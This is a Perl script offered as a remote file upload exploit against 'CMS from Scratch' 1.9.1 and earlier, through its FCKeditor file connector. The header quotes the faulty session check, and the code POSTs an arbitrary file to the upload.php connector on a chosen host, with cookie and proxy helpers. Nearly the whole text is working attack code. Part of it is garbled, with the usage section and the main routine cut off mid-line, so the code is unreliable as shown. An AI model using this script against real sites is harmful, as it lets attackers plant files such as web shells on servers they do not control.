#!/usr/bin/perl # ---------------------------------------------------------------- # CMS from Scratch <= 1.9.1 (fckeditor) Remote File Upload Exploit # by yeat - staker[at]hotmail[dot]it # http://scratchwebdesignforums.com/forums/index.php?showtopic=629 # ---------------------------------------------------------------- # (fckeditor/editor/filemanager/connectors/php/config.php) # 25. global $Config ; # 26. # 27. $Config['Enabled'] = (isset($_SESSION['loginStatus']) || # $_SESSION == NULL) ? true : false ; # ... # 39. $Config['UserFilesAbsolutePath'] = # realpath($_SERVER['DOCUMENT_ROOT']); # ---------------------------------------------------------------- use Getopt::Std; use LWP::UserAgent; getopts('p:',\my %opts); my $http = new LWP::UserAgent; my ($host,$file) = @ARGV; Main::RunExploit(); # Main Package package Main; sub Usage { return print < 4) { Main::Usage(); } else { FileUpload::Exploit($file); } } # File Upload Package package FileUpload; sub Exploit { my $file = shift; my $path = "/fckeditor/editor/filemanager/connectors/php/upload.php?Type=File"; my $data = { NewFile => [$file,$file] }; my $send = $http->post('http://'.$host.$path, $data, Content_Type => 'multipart/form-data', ); if ($send->is_success) { print $send->content; exit; } else { print "Exploit Failed!\n"; exit; } } # HTTP Package package HTTP; sub Cookies { return $http->default_header('Cookie' => $_[0]); } sub UserAgent { return $http->agent($_[0]); } sub GET { if ($_[0] !~ m{^http://(.+?)$}i) { return $http->get('http://'.$_[0]); } else { return $http->get($_[0]); } } sub http_header { return $http->default_header($_[0]); } sub Proxy { return $http->proxy('http', 'http://'.$_[0]); }